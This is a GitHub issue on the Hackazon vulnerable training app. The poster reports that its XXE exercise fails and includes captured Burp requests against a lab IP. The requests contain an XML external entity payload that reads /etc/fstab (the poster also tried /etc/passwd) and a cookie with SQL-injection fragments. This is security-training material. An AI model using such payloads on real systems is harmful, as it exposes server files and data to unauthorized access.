Skip to content
This repository has been archived by the owner on May 18, 2021. It is now read-only.

Issues with XXE #25

Open
artsalmon opened this issue Apr 8, 2020 · 0 comments
Open

Issues with XXE #25

artsalmon opened this issue Apr 8, 2020 · 0 comments

Comments

@artsalmon
Copy link

artsalmon commented Apr 8, 2020
edited
Loading

XXE vulnerabilities seem not to be function.

I have verified that in XXE is enabled in the vulnerabilities.md file, I have also logged in to the admin page and ensured that there are pages with the XXE vulnerability was enabled. I turned it on every location that I could, just in case. I verified the PHP files in the config location to ensure the the XXE was set to true for the location I was needing. I enabled XXE for the Cart/View area.

I setup BURP to intercept the HTTP GET requests, and I capture the code below

---ORGINAL CODE---
GET /success.txt HTTP/1.1
Host: 192.168.198.145
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.198.145/cart/view
Cookie: visited_products=%2C208%2C101%2C18%2C188%2C1+or+1%3D1%2C1%3D1%2C64%2C1%2C72%2C101and+1%3D1%2C81%2C76%2C78%2C163%2C21%2C16%2C; PHPSESSID=9s2mrcem0stgqk0h9c0tvtenf1
---END OF CODE---

I modified the code to have the XML example code in the vulnerability

---MODIFIED CODE---
GET /success.txt HTTP/1.1
Host: 192.168.198.145
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml
Referer: http://192.168.198.145/cart/view
Cookie: visited_products=%2C208%2C101%2C18%2C188%2C1+or+1%3D1%2C1%3D1%2C64%2C1%2C72%2C101and+1%3D1%2C81%2C76%2C78%2C163%2C21%2C16%2C; PHPSESSID=9s2mrcem0stgqk0h9c0tvtenf1

<'?xml version="1.0" encoding="utf-8"?>
<'!DOCTYPE roottag [<'!ENTITY goodies SYSTEM "file:///etc/fstab">]>
<'roottag>&goodies;
---END OF CODE---

NOTE: I added ' at the start of each line to allow the code to display correctly in the note. In the real example, the ' was removed.

I have also modified the goodies to see if the PASSWD file would display.

I only get a HTML 400 return error.

I have clearing the cache, I have tried doing this is a VM with no other content, I ensure that firefox was updated.

Has anyone tested and/or seen XXE vulnerabilities function with hackazon?
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@artsalmon